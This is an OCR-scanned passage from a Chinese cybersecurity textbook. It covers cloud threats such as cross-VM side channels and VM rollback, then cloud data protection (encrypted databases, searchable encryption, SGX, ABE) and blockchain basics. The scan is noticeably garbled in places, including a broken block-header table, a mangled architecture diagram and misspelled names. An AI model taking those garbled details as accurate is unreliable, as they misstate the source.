@ 边 信道 的 信息 与 信道 内 的 信息 相互 有 关联 ; 四 通过 边 信道 的 信息 可 以 推断 出 信道 内 隐 
含 的 关键 信息 。 

在 云 计 算 环 境 中 ,虚拟 机 之 间 可 能 通过 共同 的 宿主 机 硬件 (CPU 内存、 网 络 接口 等 ) 
产生 关联 并 相互 影响 ,满足 上 述 边 信道 攻击 的 条 件 ,这 就 为 跨 虚拟 机 边 信 道 攻击 (cross 
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VM side channels attack) 提 供 了 可 行 性 。 攻 击 者 控制 的 虚拟 机 与 目标 虚拟 机 使 用 相同 的 
物理 层 硬件 ,二 者 交替 执行 。 攻 击 者 首先 借助 恶意 虚拟 机 访问 共享 硬件 和 缓存 ,然后 在 交 
替 执行 的 过 程 中 通过 边 信道 信息 推断 出 目标 虚拟 机 的 行为 ,识别 相应 的 信息 ,最 终 导致 目 
标 虚拟 机 内 的 用 户 数据 泄露 。 目 前 已 有 研究 的 跨 虚拟 机 边 信 道 攻击 方法 包括 计时 边 信 道 
攻击 、 能 量 消耗 的 边 信道 攻击 、 高 速 隐蔽 信道 攻击 等 。 此 类 攻击 一 般 难以 留 下 痕迹 或 引发 
警报 ,因而 能 够 很 好 地 躲避 检测 。 

北 卡 罗 来 纳 州 立 大 学 ,威斯康星 大 学 和 RSA 实验 室 的 研究 者 利用 边 信道 分 析 , 通 过 
研究 目标 加 密 系统 的 电磁 泄漏 .数据 缓存 或 其 他 外 在 表现 来 破解 加 密 密 钥 ,提取 出 同一 服 
务 器 上 的 其 他 独立 虚拟 机 中 存储 的 私有 加 密 密 钥 。 研 究 人 员 花 了 数 小 时 获取 了 4096 位 
公 钥 加 密 算法 EIGamal 使 用 Libgerypt v.1.5.0 加 密 库 所 生成 公 钥 对 应 的 私 钥 。 这 被 认为 
是 首次 成 功 实现 跨 虚 拟 机 边 信道 攻击 。 

@ 网 络 隔离 。 

传统 信息 系统 依赖 V LAN 路 由 、 地 址 转换 和 访问 控制 列表 等 技术 来 实现 不 同 网 络 
安全 区 域 的 隔离 ,从 而 限制 安全 威胁 的 扩散 范围 ,并 可 以 在 网 络 安全 区 域 的 边界 处 部 署 安 
全 检测 和 监控 设备 ,来 构建 高 性 价 比 的 安全 防御 系统 。 但 在 云 计 算 平 台中 ,由 于 数据 包 在 
虚拟 网 络 中 移动 方式 的 差异 ,导致 安全 监控 和 过 滤 的 变化 很 大 。 资 源 可 以 在 物理 服务 器 
上 交互 ,而 不 用 通过 物理 网 络 传输 。 例 如 ,如 果 两 个 虚拟 机 位 于 相同 的 物理 机 器 上 ,那么 
它们 之 间 有 可 能 直接 在 该 物理 主机 的 虚拟 网 桥 上 进行 通信 ,而 不 会 将 机 箱 内 的 网 络 流量 
路 由 到 网 络 之 上 ,于 是 在 网 络 上 (或 附加 在 路 由 器 /交换 机 硬件 ) 的 监控 和 过 滤 工 具 永远 看 
不 到 这 些 流量 。 

这 在 多 租户 的 公有 云 网 络 中 引发 的 安全 问题 尤为 显著 。 两 个 相互 独立 的 信息 系统 之 
间 的 交互 ,对 于 每 一 方 来 说 都 是 从 不 可 靠 的 外 部 环境 到 自身 内 部 网 络 的 通信 ,都 需要 经 过 
部 署 在 网 关 处 的 安全 设备 的 检测 和 过 滤 ,而 当 它 们 部 署 于 同一 个 云 计 算 平 台 上 的 时 候 , 如 
果 该 平台 在 虚拟 网 络 实现 方面 处 理 不 当 , 那 么 尽管 平台 对 公共 网 络 的 出 入口 处 仍然 部 署 
有 安全 设备 ,但 两 个 系统 间 的 交互 却 不 再 受 这 些 安全 设备 的 保护 。 这 使 得 攻击 者 可 以 在 
云 平台 上 租用 虚拟 机 或 者 使 用 云 平台 提供 的 PaaS 或 SaaS 服务 接口 ,来 对 同 平台 上 的 其 
他 虚拟 机 发 起 攻击 ,或 者 攻陷 一 个 防护 较 弱 的 信息 系统 ,以 此 为 跳板 ,攻击 平台 上 其 他 信 
息 系统 。 

CD 镜像 和 快照 的 安全 。 

云 计 算 平 台 往 往 通 过 特定 的 镜像 来 创建 虚拟 机 或 者 服务 实例 。 相 比 于 传统 信息 系统 
的 操作 系统 镜像 , 云 平 台 的 镜像 实例 化 往往 是 高 度 自动 化 的 ,并 且 导 致 产生 更 多 的 基于 该 
镜像 的 资产 。 攻 击 者 通过 入 侵 虚拟 机 管理 系统 并 感染 镜像 ,可 以 大 幅 提 升 攻击 的 效率 和 
影响 范围 。 

此 外 ,在 云 计算 平台 的 虚拟 化 环境 中 ,管理 程序 出 于 系统 正常 维护 的 目的 ,可 以 随时 
挂 起 虚拟 机 并 保存 系统 状态 快照 。 若 攻击 者 非法 恢复 了 快照 ,将 会 造成 一 系列 的 安全 隐 上 
患 , 上 且 历 史 数据 将 被 清除 ,攻击 行为 将 被 彻底 隐藏 一 一 这 被 称 为 虚拟 机 回 滚 攻击 (VM 
rollback attack) 。 

由 此 可 见 ,管理 这 些 镜 像 和 快照 一 一 包含 哪些 满足 安全 要 求 .部 署 在 哪里 ,以 及 谁 可 
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以 访问 ,是 一 项 重要 的 安全 责任 。 

(2) 云 计 算 架 构 对 基础 设施 安全 的 正面 影响 

在 面临 许多 特有 的 安全 威胁 的 同时 , 云 计算 平台 的 一 些 技 术 特 点 也 会 给 安全 防御 工 
作 带 来 更 有 力 的 底层 支持 和 全 新 的 解决 方向 ,从 而 产生 正 向 的 安全 增益 。 

(D 高 度 的 管理 集中 化 和 自动 化 带 来 的 安全 增益 。 

大 多 数 安全 防御 工作 的 有 效 性 都 依赖 于 对 信息 系统 强 有 力 的 控制 和 高 度 自动 化 的 运 
维 水 平 ,而 云 计算 在 不 同 程度 上 将 底层 的 信息 基础 设施 和 上 层 的 业务 分 离开 ,使 得 对 底层 
基础 设施 的 管理 和 维护 更 加 集中 , 运 维 的 自动 化 程度 也 因为 虚拟 化 技术 以 及 专业 的 分 工 
等 因素 而 大 幅 增加 ,这些 都 极 大 地 提高 了 传统 安全 防御 手段 的 效能 。 例 如 ,对 操作 系统 的 
安全 加 固 和 补丁 管理 可 以 通过 虚拟 机 镜像 来 快速 部 署 ;安全 扫描 渗透 测试 和 安全 监控 等 
安全 服务 ,也 可 以 由 云 服务 商 或 云 平台 上 的 第 三 方 服务 提供 者 来 统一 、 高 效 地 提供 服务 。 

集中 化 也 从 管理 层面 带 来 安全 收益 。 没 有 隐匿 未 知 的 资源 ,在 任何 时 候 信息 系统 的 
维护 者 都 知道 拥有 什么 资源 .它们 在 哪里 ,如何 配 置 的 ; 云 控制 器 总 是 需要 知道 资源 池 中 
资源 的 进出 、 分 派 ,这 显著 降低 了 未 知 资源 游离 于 防御 体系 之 外 而 带 来 的 安全 威胁 。 此 
外 , 云 平台 相对 独立 的 日 志 记 录 和 行为 审计 也 可 以 有 效 控 制 内 部 人 员 恶 意 操 作 带 来 的 
风险 。 

@ 网 络 虚拟 化 和 SDN 带 来 的 安全 增益 。 

网 络 虚拟 化 是 云 计 算 的 核心 技术 之 一 ,该 技术 可 在 物理 网 络 上 虚拟 多 个 相互 隔离 的 
虚拟 网 络 , 使 得 不 同 用 户 之 间 使 用 独立 的 网 络 资源 切片 ,提高 网 络 资源 利用 率 ,实现 弹性 
的 网 络 。 软 件 定义 网 络 (Software Defined Networking. SDN) 的 出 现 使 得 网 络 虚拟 化 的 
实现 更 加 灵活 和 高 效 ,同时 网 络 虚拟 化 也 成 为 SDN 应 用 中 的 重量 级 应 用 。 

利用 网 络 虚拟 化 和 SDN 技术 ,在 云 平 台 上 可 以 实现 或 增强 多 种 网 络 安全 方面 的 防御 
手段 ,包括 但 不 限于 集中 网 络 安全 服务 策略 和 配置 管理 ,自动 化 网 络 安全 补救 ,阻止 恶意 
流量 的 终端 来 源 、 允 许 预期 流量 通过 、 网 络 策略 审核 及 检测 等 。 利 用 SDN 技术 还 能 实现 
安全 功能 的 软 交付 , 即 防火 墙 (Firewall)、 入 侵 检测 系统 (IDS)、Web 应 用 防火 墙 (WAF)、 
防 病毒 (AV) 身份 识别 和 访问 管理 (IAM) 等 安全 设备 可 以 通过 按 需 动态 部 署 的 方式 为 
云 平台 上 的 信息 系统 提供 安全 防护 。 

@ 对 业务 连续 性 的 增益 。 

业务 连续 性 (Business Continuity) 是 指 在 中 断 事 件 发 生 后 ,组 织 在 预先 确定 的 接受 水 
平 上 连续 交付 产品 或 提供 服务 的 能 力 ,在 安全 上 体现 为 基础 设施 和 服务 的 可 用 性 ,同样 是 
一 项 重要 的 安全 指标 。 实 现 业务 连续 性 的 技术 手段 包含 高 可 用 性 和 灾难 恢复 两 种 。 高 可 
用 性 指 的 是 通过 技术 手段 ,尽量 缩短 因 日 常 维护 操作 (计划 ) 和 突 发 的 系统 崩溃 ( 非 计划 ) 
所 导致 的 停机 时 间 , 以 提高 系统 和 应 用 的 可 用 性 。 高 可 用 技术 通过 对 网 卡 、.CPU、 内 存 、 
系统 软件 设置 不 同 的 可 用 性 检测 点 ,在 这 些 节点 发 生 故 障 时 实现 宛 余 切换 ,持续 提供 服 
务 。 而 灾难 恢复 是 在 信息 服务 终端 后 调动 资源 ,在 异地 重建 信息 技术 服务 平台 (包括 基础 
架构 .通信 、 系 统 、 应 用 及 数据 ) 。 

云 计算 平台 能 以 相对 低廉 的 成 本 为 信息 系统 提供 数据 备份 和 服务 器 备份 ;同时 依托 
强大 的 运 维 管理 能 力 来 及 时 监控 业务 中 断 事件 的 发 生 ;虚拟 化 技术 可 以 在 故障 发 生 时 实 
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现 系统 的 自动 切换 ,在 不 同 物 理 主机 、 存 储 、 网 络 上 在 线 迁 移 ; 云 计算 的 资源 伸缩 性 优势 还 
可 以 在 业务 量 突 发 的 情况 下 及 时 扩充 资源 来 避免 拥塞 .这 些 都 为 业务 连续 性 提供 了 有 力 
的 支撑 。 

2. 云 数据 安全 

在 云 计 算 中 ,用 户 将 数据 和 计算 委托 给 其 信任 的 云 服 务 提供 商 来 完成 ,这 种 计算 模式 
造成 数据 的 所 有 权 和 控制 权 分 离 。 通 常 我 们 会 认为 云 服务 提供 商 是 好奇 但 诚实 "的 , 即 
云 服务 提供 商会 正确 地 执行 用 户 委托 的 操作 ,但 是 会 希望 得 到 用 户 的 数据 。 在 这 种 情况 
下 ,需要 保证 用 户 数据 的 安全 。 

CD 云 存储 数据 安全 

(D 云 加 密 数 据 库 。 

加 密云 存储 是 保护 云 数据 安全 的 基本 手段 。“ 秦 盾 ? 云 加 密 数据 库 系统 基于 前 置 安全 
代理 实现 透明 化 的 数据 安全 存 取 ,降低 用 户 操作 需求 。 在 安全 代理 中 ,用 户 可 实现 数据 加 
密 密 钥 管理 ,数据 列 定制 加 密 、 细 粒度 访问 控制 等 操作 ,实现 数据 库 的 透明 化 访问 ,可 以 兼 
容 当前 主流 数据 存储 系统 。 系 统 架 构 如 图 6-27 所 示 。 


数据 使 用 者 


秦 盾 (QinCloudDB ) 


密 钥 协商 | | 查询 重 写 器 | | 用 户 定制 接口 | | 结果 验证 器 | | 元 数据 管理 
z 列 | | 本 | [ 存 | [ 存 | [ 完 | [a] [a 

基于 身份 | | 加 、 解 密 | | 级 | | 地 | | 储 | | 全 | |€| | 有 | | 有 
的 属性 算法 库 密 | | 数 | | 位 | | 模 | | 性 | | 云 | iz 
管理 器 文 | | 据 | | 置 | | 态 | | 验 | | 如 | | 区 
i| | 服 | | | 管 | | 证 | | 务 | ls 

态 | | 务 | | 理 | m 审 | [Uu 

管 计 控 

密 钥 管理 器 2 


6-27 “ 秦 盾 " 云 加 密 数据 库 系 统 架 构 


“ 秦 慎 " 云 加 密 数 据 库 系统 的 核心 功能 包括 基于 明文 索引 结构 的 密 钥 管理 . 自 适应 可 
定制 的 数据 列 安全 分 级 加 密 、 基 于 属性 的 细 粒 度 访问 控制 。 

针对 云 计算 环境 中 海量 密 钥 管理 的 问题 ,设计 了 基于 明文 索引 的 密 钥 管理 体系 结构 。 
系统 根据 数据 存 、 取 过 程 的 不 同 ,分 别 与 租户 和 用 户 协商 数据 的 存储 密 钥 和 会 话 密 钥 , 同 
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时 ,利用 现 有 数据 库 的 明文 索引 及 加 密 哈 希 树 的 密 钥 管理 架构 ,对 数据 块 的 存储 密 钥 建立 
密 钥 索引 机 制 ,解决 了 海量 数据 时 密 文 数据 搜索 效率 低下 的 问题 。 

为 支持 关系 数据 库 服 务 中 的 增 、 删 、 改 、 查 操作 ,需要 对 原始 数据 列 进行 多 层 、 多 级 扩 
展 加 密 。 结 合租 户 对 数据 敏感 性 的 不 同 需求 ,设计 了 可 定制 的 数据 库 列 安全 分 级 加 密 方 
式 , 租 户 可 以 通过 用 户 定制 接口 ,根据 数据 列 的 敏感 等 级 ,选择 不 同 的 加 密 方式 。 针 对 安 
全 级 较 高 且 数 据 量 较 少 的 数据 ,用 户 在 无 需 条 件 查询 时 ,可 选择 随机 加 密实 现 高 安全 保 
护 ; 针 对 有 安全 需求 且 数 据 量 较 大 的 数据 ,用 户 为 实现 条 件 查询 , 则 选择 多 级 扩展 加 密 , 用 
于 支持 关系 数据 库 服务 中 的 增 、 删 \ 改 、 查 操作 ;针对 非 敏 感 数 据 ,用 户 可 进行 任意 查询 , 则 
选择 不 加 密 。 

针对 云 计 算 环境 下 海量 的 数据 用 户 及 其 访问 权限 的 多 样 化 ,设计 了 具有 基于 属性 的 
细 粒 度 访问 控制 机 制 , 解 决 了 访问 规则 海量 化 管理 复杂 化 的 问题 。 

由 于 采用 代理 服务 模式 ,该 架构 具有 很 好 的 可 扩展 性 ,支持 大 规模 的 并 发 操作 , 百 万 
条 记录 的 数据 库 执行 增 、 删 、 改 、 查 等 操作 时 间 为 毫秒 级 , 相 比 于 传统 非 加 密 数据 库 ,查询 
响应 时 间 差 距 限制 在 5% 范围 内 ;系统 容易 部 署 ,对 应 用 和 用 户 透 明 。 

@ 密 文 搜索 。 

对 加 密 数据 的 搜索 是 安全 云 存 储 应 用 中 的 一 个 基本 功能 ,典型 的 具备 隐私 保护 功能 
的 密 文 关 键 词 搜索 系统 如 图 6-28 所 示 ,其 包括 数据 所 有 者 ,数据 使 用 者 和 云 服务 提供 商 
(CSP)3 个 参与 者 。 数 据 所 有 者 将 加 密 数据 和 安全 索引 上 传 存 储 于 CSP, 数 据 一 般 使 用 
诸如 SM4 之 类 的 对 称 密码 算法 加 密 ,而 安全 索引 则 使 用 特定 的 可 搜索 加 密 机 制 生成 。 可 
搜索 加 密 机 制 可 分 为 对 称 可 搜索 加 密 (Symmetric Searchable Encryption,SSE) 和 非 对 称 
可 搜索 加 密 (Asymmetric Searchable Encryption, ASE)。SSE 主要 用 于 数据 拥有 者 和 搜 
索 数据 者 是 同一 人 的 情况 ,其 他 人 除非 拥有 租户 的 私 钥 , 否 则 无 法 进行 搜索 ;ASE 的 搜索 
者 和 数据 拥有 者 可 以 是 不 同 实体 。 微 软 研 究 院 密码 技术 小 组 的 Seny Kamara 和 Kristin 
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628 ” 云 环 境 密 文 搜索 示意 图 


243 


网络 空 间 安 全 导论 6 


Lauter 在 题 为 “加 密 的 云 存储 ”的 白皮书 中 指出 ,用 带 关键 字 搜 索 公 钥 加 密 技术 可 以 实 
现 “ 虚 拟 的 私有 云 服务 ”, 即 云 服 务 提供 者 可 以 对 租户 数据 在 不 解密 的 条 件 下 对 租户 加 
密 数据 进行 搜索 ,解决 了 “备份 ,归档 、 健 康 记录 系统 、 安 全 数据 交换 以 及 电子 发 气 
(e-Discovery) ”等 安全 问题 。 

当 用 户 想 搜索 云 服务 器 中 的 加 密 数据 时 ,数据 使 用 者 会 产生 陷 门 (采用 ASE) 或 者 向 
数据 所 有 者 请 求 陷 门 (采用 SSE) ,然后 将 陷 门 发 送 给 CSP。CSP 执行 搜索 算法 ,向 数据 
使 用 者 返回 搜索 的 结果 。 搜 索 可 以 基于 一 定 的 排序 准则 ,将 最 匹配 的 前 & 个 相关 的 结果 
返回 。 

相对 传统 的 明文 搜索 而 言 , 密 文 搜索 的 功能 受 限 ,复杂 度 也 更 大 。 目 前 密 文 搜索 方案 
也 成 为 持续 的 研究 热点 ,提出 包含 多 关键 词 模糊 搜索 .范围 查询 .支持 排序 的 搜索 .支持 搜 
索 结 果 完 备 性 验证 的 查询 等 多 个 方案 。 

@ 密 文 数据 可 信 删 除 。 

云 存 储 的 数据 需要 全 生命 周期 安全 管理 ,一 个 难点 问题 是 如 何 保证 云端 的 密 文 数据 
到 达 一 定期 限时 能 够 安全 删除 。 通 过 消 磁 、 覆 写 .数据 清洗 .软件 擦 除 程序 等 删除 存储 介 
质 中 保存 的 数据 是 现在 常用 的 方式 ,但 在 云 计 算 环 境 下 并 不 适合 ,因为 数据 所 有 者 并 不 确 
信 云 服务 提供 商会 真正 完全 地 销毁 数据 。 所 以 基于 密码 学 的 方法 是 更 合适 的 方法 。 将 数 
据 存储 在 云端 之 前 进行 加 密 ,将 云端 数据 的 安全 销毁 实际 上 就 转化 为 用 户 端 对 应 密 钥 的 
安全 销毁 。 一 旦 用 户 可 以 安全 地 销毁 密 钥 ,那么 即使 不 可 信 的 云 服务 器 仍然 保留 用 户 本 
该 销毁 的 密 文 数据 ,也 不 能 破坏 用 户 数据 的 机 密 性 。 

Geambasu 提出 了 一 种 数据 自 毁 方案 Vanish, 密 钥 被 Vanish 经 过 秘密 分 享 处 理 后 分 
散 到 大 规模 分 散 的 DHT 网 络 中 ,每 个 节点 将 保存 的 密 钥 分 量 每 隔 8 小 时 后 会 被 DHT 网 
络 自动 清除 ,使 得 不 能 恢复 原始 密 钥 ,从 而 密 文 不 可 读 ,无 须 人 为 操作 即 可 实现 数据 自 毁 。 

(2) 云 计算 数据 安全 

保密 计算 (Confidential Computing) 是 当前 工业 界 发 起 的 聚焦 计算 过 程 中 数据 保护 
的 新 兴 技 术 。 其 可 以 让 加 密 的 数据 在 内 存 中 处 理 ,其 他 用 户 无 法 访问 ,降低 其 在 系统 的 其 
他 部 分 被 泄露 的 风险 。 保 密 计算 在 降低 敏感 数据 泄露 风险 的 同时 对 用 户 保持 高 度 的 透 
明 。 在 多 租户 的 公有 云 环境 中 ,保密 计算 保证 敏感 数据 可 与 系统 堆栈 的 其 他 授权 部 分 隔 
离 ,因此 得 到 极 大 的 关注 。 

Intel SGX(Software Guard Extensions) 技 术 是 目前 实现 保密 计算 的 主要 方法 。 其 于 
2015 年 发 布 ,在 内 存 中 生成 一 个 称 为 “ 飞 地 (enclave)” 的 隔离 环境 ,如 图 6-29 所 示 。SGX 
使 用 强加 密 和 硬件 级 隔离 确保 数据 和 代码 的 机 密 性 以 防止 攻击 ,即使 操作 系统 、 
Hypervisor 或 者 BIOS 固件 被 攻陷 的 情况 仍 可 以 保护 应 用 和 代码 的 安全 ,因而 SGX 可 以 
构建 一 种 可 信 计 算 环境 。 通 常 在 应 用 过 程 中 .数据 在 存储 和 传输 过 程 中 加 密 , 在 使 用 时 则 
被 解密 。 保 密 计算 的 目标 则 是 希望 数据 在 内 存 等 待 被 处 理 的 时 候 仍然 是 加 密 的 ,只 在 系 
统 中 的 代码 允许 用 户 访 问 数据 的 时 候 被 解密 。 这 意味 着 数据 对 云 服 务 商 也 是 保密 的 。 

保密 计算 需要 硬件 和 软件 开发 者 广泛 协同 。 利 用 Intel SGX ,应 用 开发 者 可 以 在 内 存 
中 加 密 数据 ,或 者 用 SDK 在 固件 中 生成 一 个 可 信 计 算 环 境 TEE。 微 软 的 Open Enclave 
SDK 是 最 近 出 现 的 一 个 开源 框架 ,允许 开发 者 用 一 个 封装 抽象 (enclaving abstraction ) 构 
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6-29 ”SGX Enclave 示意 图 


&& TEE 应 用 。 为 保证 保密 计算 的 大 规模 应 用 ,需要 硬件 开发 商 \ 云 提供 商 、 开 发 者 、 开 源 
专家 和 学 术 界 的 广泛 合作 。 保 密 计算 联盟 (Confidential Computing Consortium) 就 是 这 样 一 
个 组 织 , 阿 里 、 百 度 、Google、IBM、ARM、Intel、Microsoft、Redhat 都 是 该 组 织 的 成 员 。 

保密 计算 有 很 多 应 用 场景 ,包括 保护 数据 不 被 恶意 攻击 者 窃取 ,确保 数据 符合 GPDR 
等 法 规 要 求 ,保护 财务 数据 、 加 密 密 钥 和 其 他 机 密 数据 的 安全 ,在 不 同 环境 中 迁移 作业 的 
时 候 确保 使 用 中 的 数据 安全 ,开发 可 跨 云 平台 的 移动 的 安全 应 用 等 。 

基于 同 态 加 密 的 密 文 计算 也 是 保护 云 数 据 计算 安全 的 新 兴 技 术 。 然 而 密 文 计算 的 复 
杂 度 很 大 ,理论 研究 非常 活跃 ,但 在 工业 界 实际 应 用 还 有 不 小 的 距离 。 

(3) 云 共享 数据 安全 

云 计算 环境 下 的 数据 共享 也 是 普遍 的 应 用 需求 ,在 云 环 境 下 基于 密码 学 方法 实现 数 
据 的 可 控 安 全 共享 成 为 热点 技术 ,基于 属性 加 解密 方案 ABE CAttributed Based 
Encryption) 是 另 一 种 控制 接收 者 对 加 密 数 据 解 密 能 力 的 密码 机 制 , 当 用 户 所 拥有 的 属性 
满足 一 定 的 访问 策略 时 就 可 以 解密 信息 。 数 据 所 有 者 可 以 使 用 ABE 实现 KEM, 以 控制 
加 密 数据 文件 在 满足 访问 策略 的 用 户 集合 中 共享 。ABE 包括 密 文 策略 属性 加 密 (CP- 
ABE) 和 密 钥 策略 属性 加 密 (KP-ABE) 两 种 。 

KP-ABE 的 访问 策略 嵌入 到 密 钥 当中 , 当 用 户 属性 满足 访问 策略 公式 的 时 候 可 以 恢 
复出 密 钥 ,从 而 可 以 解密 消息 ,本质 上 是 一 个 多 级 的 秘密 共享 机 制 。KP-ABE 方案 需要 根 
据 访 问 策略 的 不 同 ,向 具有 权限 的 用 户 分 配 解密 私 钥 份额 ,尤其 是 当 访问 策略 改变 时 , 需 
要 重新 分 配 解密 私 钥 份 额 ,这 样 对 用 户 带 来 了 较 大 的 密 钥 管 理 开 销 。 

CP-ABE 是 将 访问 控制 策略 岩 入 到 密 文 当 中 ,只 有 当 用 
户 拥有 满足 访问 控制 策略 的 属性 集合 及 其 对 应 的 私 钥 情况 
下 才能 解密 密 文 。 一 种 访问 结构 的 描述 方式 是 将 其 描述 成 
为 一 棵 访问 树 ,授权 策略 对 应 为 一 个 单调 的 逻辑 表达 式 。 树 
的 中 间 节 点 为 门限 门 , 叶 节 点 表示 属性 。(n,&) 门 限 门 表示 
7 个 输入 当 & 个 为 1 时 门 输出 1 .和 否则 输出 0。 与 门 和 或 门 可 
以 分 别 看 作 (n,n) 和 (n,1) 门 限 门 。 这 样 , 当 访 问 树 在 根 节 
点 输出 为 1 则 表示 满足 授权 策略 。 如 图 6-30 所 示 的 访问 树 ， 
授权 策略 可 表示 为 (属性 1 and 属性 2)or 属性 3, 即 当 用 户 


6-30 ”访问 树 
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拥有 属性 1 和 属性 2, 或 者 拥有 属性 3 时 ,具有 访问 权限 。 

CP-ABE 将 属性 密 钥 分 配给 用 户 , 每 个 属性 拥有 对 应 的 解密 私 钥 。 为 了 对 抗 多 个 用 
户 将 其 属性 私 钥 集 合 应 用 获得 解密 能 力 的 合谋 攻击 ,每 个 用 户 同样 属性 的 解密 私 钥 是 不 
同 的 ,只 能 由 其 本 人 使 用 。 一 般 而 言 ,CP-ABE 在 公 钥 长 度 为 常数 的 情况 下 , 私 钥 长 度 、 密 
文 的 长 度 、 加 密 的 计算 量 都 和 属性 的 数目 呈 线 性 关系 。 
由 于 CP-ABE 访问 策略 嵌入 到 密 文 当中 ,因此 数据 所 有 者 可 以 根据 不 同文 件 生成 不 
同 的 访问 策略 ,而 用 户 的 属性 私 钥 不 用 更 换 , 因 此 更 加 适合 实际 应 用 场景 。 


65 区 块 链 及 其 安全 


6.5.1 比特 币 与 区 块 链 


2008 年 ,化 名 为 中 本 聪 (Satoshi Nakamoto) 的 学 者 发 表 了 著名 文章 Bitcoin: A peer 
to peer electronic cash system 介绍 了 一 种 加 密 数字 货币 一 一 比特 币 ,比特 币 是 一 个 无 中 
心 电 子 现金 系统 ,区 块 链 (Block chain) 就 是 其 基础 支撑 技术 。 通 俗 地 讲 , 区 块 链 是 采用 了 
密码 技术 的 去 中 心 化 的 分 布 式 数据 库 , 在 区 块 链 网 络 中 没有 中 心 节点 ,所 有 节点 地 位 相 
同 。 每 个 节点 都 监听 一 个 时 间 段 内 区 块 链 网 络 中 的 所 有 交易 ,并 将 交易 数据 以 区 块 方式 
打包 。 同 时 通过 共识 机 制 竞争 将 其 区 块 加 入 到 区 块 链 当中 的 记 账 权 。 比 特 币 系统 的 共识 
机 制 就 通过 依靠 算 力 解决 Hash 函数 的 碰撞 问题 , 即 工作 量 证 明 POW(proof of work) 机 
制 ,最 先 解 出 难题 的 节点 获得 记 账 权 , 系 统 会 给 该 节点 奖励 一 定数 量 的 比特 币 。 

各 个 区 块 以 时 间 先 后 顺序 排列 ,一 个 完整 的 区 块 包括 区 块头 (block head) 和 区 块 体 
(block body) 两 部 分 ,如 图 6-31 所 示 。 

区 块头 的 内 容 如 表 6-3 所 示 。 


表 6-3 区 块头 内 容 
长 度 ( 字 节 ) T £&&R 说 o 明 

4 LES 区 块 版 本 号 ,用 以 标识 本 区 块 遵守 的 验证 规则 

32 前 一 区 块头 的 Hash | 对 前 一 个 区 块头 使 用 SHA256 算法 计算 

32 Merkel 根 该 区 块 中 交易 Merkel 树 根 的 Hash 值 ,使 用 SHA256 算法 计算 
该 区 块 产生 近似 时 间 ,精确 到 秒 ,必须 严格 大 于 前 11 个 区 块 时 

4 I] pa] f Ta] (19 vf: (Bg . 45 x d 2 TE 46 E 6 T a] EGER HH FI Ch RUIN [8] 2 个 
小 时 的 区 块 

难度 目标 该 区 块 工作 量 证 明 算法 难度 目标 ,可 以 有 效 控制 网 络 中 产生 新 
区 块 的 速度 

4 Nonce 目标 Hash, 解 难题 就 是 要 找到 这 个 Hash 的 原 像 


其 中 ,Merkel 树 根 可 以 对 存储 在 当前 区 块 的 所 有 交易 信息 进行 完整 性 验证 ;难度 目 

标 可 以 通过 控制 Hash 值 的 长 度 有 效 控制 网 络 中 产生 新 区 块 的 速度 。 早 期 ,比特 币 每 10 

分 钟 产生 一 个 区 块 ;随机 数 (nonce) 就 是 一 个 目标 Hash 值 ,要 求解 的 难题 就 是 找 这 个 
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前 一 区 块 后 一 区 块 
| 
| 区 块头 | 块头 
.器 上 | 前 区 块 难度 || fg 前 区 块 难度 || ps 
版 本 号 哈 希 值 时 间 截 目标 随机 数 版 本 号 哈 希 值 时 间 戳 目标 随机 数 
Merkle 根 Merkle 根 
E pl a Re] 
Hash1234 区 块 体 Hash1234 区 块 体 
Hash12 Hash34 Hash12 Hash34 
Hashl Hash2 Hash3 | Hash4 Hashl Hash2 Hash3 Hash4 
Coinbase 交易 2 交易 3 | 交易 4 Coinbase 交易 2 交易 3 交易 4 


图 6-31 区 块 链 结构 图 


Hash 值 的 原 像 。 求 解难 题 的 过 程 就 是 俗称 “ 挖 矿 ”, 参 与 挖 矿 的 节点 就 是 “矿工 ”。 

区 块 体 保存 着 区 块 中 的 具体 交易 内 容 。 如 图 6-31 所 示 ,第 一 个 交易 coinbase 是 必须 
存在 的 ,记录 了 系统 给 予 挖 矿 成 功 者 的 奖励 。 后 面 的 交易 是 比特 币 系统 中 的 转账 交易 记 
录 。 这 些 交 易 通 过 图 中 所 示 的 Merkel Hash 链 的 计算 方法 计算 出 Merkel 数 根 Hash 放 
在 区 块 链 的 头 部 。 如 果 有 人 想 要 修改 交易 记录 的 话 ,必然 导致 Merkel 根 也 要 相应 修改 ， 
否则 就 会 校 验 无 法 通过 。 

这 样 通过 引用 前 一 个 生成 的 区 块 里 的 Hash. 值 , 建 立 起 区 块 之 间 的 链接 形成 区 块 链 。 
一 个 例外 是 链 上 的 第 一 个 区 块 , 称 为 创 世 区 块 (genesis) ,其 没有 父 级 。 任 何 拥有 访问 权 
限 的 节点 ,都 能 从 这 一 条 时 间 有 序 的 区 块 链条 中 获得 数据 信息 ,以 及 正在 网 络 上 进行 的 交 
易 的 数据 状态 。 


6.5.2. ”共识 机 制 


在 区 块 链 系 统 中 ,共识 机 制 可 保障 在 网 络 中 存在 故障 或 不 可 信 节 点 的 情况 下 ,区 块 链 
网 络 中 的 交易 按照 预期 的 正确 的 方式 执行 ,为 网 络 中 的 各 个 参与 节点 提供 确认 交易 的 机 
制 ,确保 各 个 节点 最 终结 果 的 一 致 性 ,避免 某 些 节点 的 数据 与 最 终 账 本 的 数据 不 一 样 的 情 
况 发 生 。 比 较 常用 的 共识 机 制 有 POW、POS、PBFT 等 。 


1. POW (工作 量 证 明 ) 

POW 是 应 用 于 比特 币 系 统 的 共识 机 制 , 网 络 中 的 节点 需要 通过 不 断 计 算 寻 找 满足 
规则 和 小 于 难度 目标 的 哈 希 值 .并 约定 谁 能 优先 算出 正确 答案 , 谁 就 可 以 获得 比特 币 网 络 
的 奖励 以 及 当前 区 块 的 记 账 权 。 获 取 到 记 账 权 的 节点 随后 打包 区 块 ,并 将 打包 好 的 区 块 
广播 给 全 网 其 他 节点 。 全 网 节点 接收 到 区 块 后 .会 对 该 区 块 进行 验证 ,验证 内 容 包括 交易 
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是 否 合法 、 难 度 值 是 否 达到 要 求 等 。 验 证 通过 后 ,新 区 块 将 被 添加 到 区 块 链 中 。 这 一 机 制 
实现 了 去 中 心 化 ,具有 较 高 的 安全 性 。 但 是 该 机 制 也 存在 着 缺点 , 挖 矿 的 过 程 造成 了 大 量 
资源 的 浪费 ,网 络 交易 性 能 较 低 ,区 块 确认 共识 达成 周期 较 长 。 


2. POS( 权 益 证 明 ) 

POS(Proof Of Stake) 试 图 解决 POW 机 制 中 大 量 资源 被 浪费 的 缺点 ,根据 节点 持 有 
代 币 的 比例 以 及 占有 代 币 的 时 间 来 降低 控 矿 难度, 进而 提高 寻找 随机 数 的 效率 。POS 机 
